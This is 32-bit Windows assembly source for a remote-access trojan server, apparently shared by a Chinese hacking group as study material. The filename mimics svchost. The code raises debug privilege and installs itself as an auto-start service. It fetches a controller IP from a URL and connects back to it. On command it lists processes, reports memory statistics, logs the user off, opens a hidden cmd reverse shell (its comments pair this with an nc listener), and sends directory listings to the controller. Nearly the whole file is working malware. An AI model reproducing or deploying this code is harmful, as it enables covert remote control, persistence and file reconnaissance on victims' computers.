scvhost.asm

红狼安全小组编写的赤兔远控程序源码,学windows下32位汇编的同志可以看看~

;******************************************************
;程序编写by Asm
;日期：2007-4-10日
;出处：http://www.wolfexp.net/（红狼安全小组）
;注意事项：如欲转载，请保持本程序的完整，并注明：
;转载自 红狼安全小组(http://www.wolfexp.net/)
;******************************************************
.386
.model   flat,stdcall
option   casemap:none
include   windows.inc
include   user32.inc
include   kernel32.inc
include   wsock32.inc
include   Ws2_32.inc
include		wininet.inc
include advapi32.inc
includelib   user32.lib
includelib   kernel32.lib
includelib   wsock32.lib
includelib   Ws2_32.lib
includelib	wininet.lib
includelib advapi32.lib
include macros.inc

.data


szExit db "远程主机正在响应命令.........",13,10,0
szExit1 db "命令已经成功执行........",13,10,0
lpBuffer	db	1024	dup(0)
buff db "%s",13,10,0
szUrl   db 'http://                                                           ',0

	.data?
buff1 db 1025 dup(?)
szIP db 1025 dup(?)
szSerice db 1024 dup(?)
server		SOCKET	?
client		SOCKET	?
hWinMain dd ?
stProcess PROCESSENTRY32<?>
hSnapShot dd ?
closepid dd ?
Pid dd ?
dwFolderCount dd ?
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_EnablePrivilege proc szPriv:DWORD, bFlags:DWORD
    LOCAL   hToken
    LOCAL   tkp : TOKEN_PRIVILEGES
    
    invoke GetCurrentProcess ;GetCurrentProcess获得当前进程的HANDLE
    mov   edx, eax
    invoke OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken ;获取进程访问令牌
    invoke LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid;一个权限对应的LUID值
    mov   tkp.PrivilegeCount, 1
    xor   eax, eax
    .if bFlags
          mov   eax, SE_PRIVILEGE_ENABLED
    .endif
    mov   tkp.Privileges.Attributes, eax
    invoke AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0 ;对这个访问令牌进行修改
    push   eax
    invoke CloseHandle, hToken
    pop   eax
    ret
_EnablePrivilege endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ReadInternet	proc
		local	@hSession,@hHttpFile,@dwRead ;局部参数
		pushad ;所有寄存器压栈保存
	   invoke RtlZeroMemory,addr szIP,sizeof szIP 
		invoke	InternetOpen,CTXT("ReadFile"),INTERNET_OPEN_TYPE_PRECONFIG,\
			NULL,NULL,0 ;打开internet
		.if	eax ;测试返回值
		mov	@hSession,eax ;保存句柄
		.endif
		invoke	InternetOpenUrl,@hSession,addr szUrl,NULL,0,INTERNET_FLAG_NO_AUTO_REDIRECT,0
		.if	eax
		mov	@hHttpFile,eax
		.endif
		invoke	InternetReadFile,@hHttpFile,addr szIP,sizeof szIP,addr @dwRead;读出IP并且保存
		invoke	InternetCloseHandle,@hHttpFile;关闭句柄
		invoke	InternetCloseHandle,@hSession
		popad ;恢复
		ret
_ReadInternet endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>..
_Process proc
invoke   RtlZeroMemory,addr stProcess,sizeof stProcess;清空内存
mov   stProcess.dwSize,sizeof stProcess
invoke   CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,addr stProcess
mov   hSnapShot,eax
invoke   Process32First,hSnapShot,addr stProcess
    .while   eax
    invoke RtlZeroMemory,addr buff1,sizeof buff1
    invoke wsprintf,addr buff1,addr buff,addr stProcess.szExeFile
    invoke lstrlen,addr buff1
    invoke send,server,addr buff1,eax,0
       push stProcess.th32ProcessID
       pop closepid
       invoke Sleep,1000;休眠，不然发送到客户端不规则
       invoke   Process32Next,hSnapShot,addr stProcess
      .endw
    ret
_Process endp 
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;这里设置的shell反弹端口要和NC监听的一样
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Cmd proc
local   @wsaData:WSADATA
local   @stAddr:sockaddr_in
local   stStartUp:STARTUPINFO
local   stProcInfo:PROCESS_INFORMATION
local   hSocket
invoke  WSAStartup,202h,addr @wsaData ;初始化WSAStartup库
invoke WSASocket,PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 ;加载套接字
mov   hSocket,eax ;保存句柄
mov   @stAddr.sin_family,AF_INET ;设置IP格式
invoke   htons,8888 ;设置端口
mov   @stAddr.sin_port,ax ;保存
invoke inet_addr,addr szIP;转换读取到的IP
mov  @stAddr.sin_addr,eax
invoke   connect,hSocket,addr @stAddr,sizeof @stAddr;如果有客户端连接，马上确定
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
invoke	GetStartupInfo,addr stStartUp
mov ebx,hSocket ;保存套接字到ebx
mov stStartUp.hStdInput,ebx ;给成员赋值，准备cmd转向输出
mov stStartUp.hStdOutput,ebx
mov stStartUp.hStdError,ebx
mov stStartUp.dwFlags,101h
mov stStartUp.wShowWindow,SW_HIDE
invoke CreateProcess,NULL,CTXT("cmd"),NULL,NULL,1,0,NULL,NULL,addr stStartUp,addr stProcInfo
invoke WaitForSingleObject,addr stProcInfo.hProcess,INFINITE ; 阻塞等待进程结束
invoke closesocket,hSocket
ret
_Cmd endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CreateSerice proc
    LOCAL   hSCManager
    LOCAL   hService
    LOCAL   szBuff[MAX_PATH] :byte
    LOCAL   ServiceStatus:SERVICE_STATUS
    invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE ;连接服务管理器
    .if eax!=0
          mov   hSCManager, eax ;连接成功，返回一个句柄
          
          invoke OpenService, hSCManager,CTXT("GetSysService"), DELETE ;打开服务
          .if eax!=0 ;打开失败
                push   eax ;直接传递参数删除
                invoke DeleteService, eax 
                call   CloseServiceHandle
          .endif
          invoke GetModuleFileName,NULL,addr szBuff,200
          invoke CreateService, hSCManager,CTXT("GetSysService"),CTXT("GetSysForShellexecute"),\  ;创建服务！
                    SERVICE_START + SERVICE_QUERY_STATUS + DELETE, \
                    SERVICE_WIN32_OWN_PROCESS + SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START, \
                    SERVICE_ERROR_IGNORE, addr szBuff,NULL, NULL, NULL, NULL, NULL
          .if eax!=0
                mov   hService, eax
                invoke StartService, hService, 0, NULL;开始打开执行！
                invoke CloseServiceHandle, hService
          .endif
          invoke CloseServiceHandle, hSCManager
    .endif
    ret
_CreateSerice endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_FindFile	proc	_lpszPath
		local	@stFindFile:WIN32_FIND_DATA
		local	@hFindFile
		local	@szPath[MAX_PATH]:byte		;用来存放“路径\”
		local	@szSearch[MAX_PATH]:byte	;用来存放“路径\*.*”
		local	@szFindFile[1025]:byte	;用来存放“路径\找到的文件”
      local hWnd
		pushad
		invoke RtlZeroMemory,addr @szPath,sizeof @szPath
		invoke RtlZeroMemory,addr @szSearch,sizeof @szSearch
		invoke	lstrcpy,addr @szPath,_lpszPath
;********************************************************************
; 在路径后面加上\*.*
;********************************************************************
		@@:
		invoke	lstrlen,addr @szPath
		lea	ebx,@szPath
		add	ebx,eax
		xor	eax,eax
		mov	al,'\'
		.if	byte ptr [ebx-1] != al
			mov	word ptr [ebx],ax
		.endif
		invoke	lstrcpy,addr @szSearch,addr @szPath
		invoke	lstrcat,addr @szSearch,CTXT("*.*")
;********************************************************************
; 寻找文件
;********************************************************************
		invoke	FindFirstFile,addr @szSearch,addr @stFindFile
		.if	eax !=	INVALID_HANDLE_VALUE
			mov	@hFindFile,eax
			.repeat
				invoke	lstrcpy,addr @szFindFile,addr @szPath
				invoke	lstrcat,addr @szFindFile,addr @stFindFile.cFileName
				.if	@stFindFile.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY ;找到的是目录吗？
					.if	@stFindFile.cFileName != '.'
						inc	dwFolderCount
						invoke	_FindFile,addr @szFindFile;如果找到的是目录，就递归继续找
					.endif
				.else
					invoke lstrlen,addr @szFindFile
               invoke send,server,addr @szFindFile,eax,0 ;发送找到的文件
				.endif
				invoke Sleep,50;休眠一会，不然发送到客户端上去会很不规则
				invoke	FindNextFile,@hFindFile,addr @stFindFile
			.until	eax == FALSE
			invoke	FindClose,@hFindFile
		.endif
		popad
		ret
_FindFile	endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_send proc _serices
invoke lstrlen,_serices
invoke send,server,_serices,eax,0
invoke Sleep,50
ret
_send endp
;**********************************************************************
_GetMoudel proc
local stMemInfo:MEMORYSTATUS

invoke RtlZeroMemory,addr stMemInfo,sizeof stMemInfo
mov stMemInfo.dwLength,sizeof stMemInfo
invoke GlobalMemoryStatus,addr stMemInfo

invoke wsprintf,addr szSerice,CTXT("物理内存总数     %lu 字节"),stMemInfo.dwTotalPhys
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke wsprintf,addr szSerice,CTXT("空闲物理内存     %lu 字节"),stMemInfo.dwAvailPhys
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke wsprintf,addr szSerice,CTXT("虚拟内存总数     %lu 字节"),stMemInfo.dwTotalPageFile
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke wsprintf,addr szSerice,CTXT("空闲虚拟内存     %lu 字节"),stMemInfo.dwAvailPageFile
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke wsprintf,addr szSerice,CTXT("CPU使用率        %d%%"),stMemInfo.dwMemoryLoad
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke lstrlen,CTXT("————————————————")
invoke send,server,CTXT("————————————————"),eax,0
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke wsprintf,addr szSerice,CTXT("用户地址空间总数 %lu 字节"),stMemInfo.dwTotalVirtual
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
invoke wsprintf,addr szSerice,CTXT("用户可用地址空间 %lu 字节"),stMemInfo.dwAvailVirtual
invoke _send,addr szSerice
invoke RtlZeroMemory,addr szSerice,sizeof szSerice
ret
_GetMoudel endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CmdLineToShell proc _FileName
            .if	lpBuffer=='l'
				invoke _Process;判断接收客户端发来的命令，如果是l就列举进程并发送过去
			.elseif	lpBuffer=='e'
				invoke _GetMoudel
			.elseif	lpBuffer=='o'
				invoke lstrlen,addr szExit
				invoke send,server,addr szExit,eax,0
				invoke ExitWindowsEx,EWX_LOGOFF,0
				invoke lstrlen,addr szExit1
				invoke send,server,addr szExit1,eax,0				
			.elseif	lpBuffer=='c'
				call	_Cmd
				.endif
				ret
_CmdLineToShell endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Main	proc
		local	@stData:WSADATA
		local	@temp:SOCKET
		local	@stAddr:sockaddr_in
      local	@dwRecv,ThreadId4
       
      call _CreateSerice ;设置系统服务启动
		invoke	WSAStartup,202H,addr @stData
		invoke	RtlZeroMemory,addr @stAddr,sizeof sockaddr_in
		mov	@stAddr.sin_family,AF_INET
		;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
		;这里连接的端口要和客户端监听的端口一样
		;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
		invoke	htons,1028
		mov	@stAddr.sin_port,ax
		call _ReadInternet
		invoke inet_addr,addr szIP
		mov @stAddr.sin_addr,eax
		invoke	socket,AF_INET,SOCK_STREAM,0
		.if	eax==INVALID_SOCKET
			mov	eax,FALSE
			ret
		.endif
		mov	server,eax
      invoke connect,server,addr @stAddr,sizeof @stAddr
      .if eax==SOCKET_ERROR
      .endif
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;循环处理客户消息命令
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
		.while	TRUE
			invoke RtlZeroMemory,addr lpBuffer,sizeof lpBuffer
			invoke	recv,server,addr lpBuffer,1024,0
			mov @dwRecv,eax
			invoke lstrlen,addr lpBuffer
			.if eax==1
				invoke _CmdLineToShell,addr lpBuffer
			.elseif (eax>=3)||(eax<=44);文件查看
				invoke _FindFile,addr lpBuffer
				.endif
			.break	.if	@dwRecv==SOCKET_ERROR 
		.endw
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
		.if	server!=INVALID_SOCKET
			invoke	closesocket,server
		.endif
		invoke	WSACleanup
		mov	eax,TRUE		
		ret
_Main	endp
start:
invoke MessageBox,NULL,CTXT("真的要执行远控服务端程序吗?"),CTXT("提示"),MB_YESNO or MB_ICONINFORMATION
.if eax!=IDNO
   invoke _EnablePrivilege,CTXT("SeDebugPrivilege"), TRUE
   invoke CreateMutex, NULL, TRUE,CTXT("GetSys1_Mutex")
   mov ebx,eax
   invoke GetLastError
   .if eax!=0B7h
@@:
		invoke	_Main
	Loop @B
	.elseif
	jmp close
   .endif
.endif

close:   
		invoke	ExitProcess,0
		end	start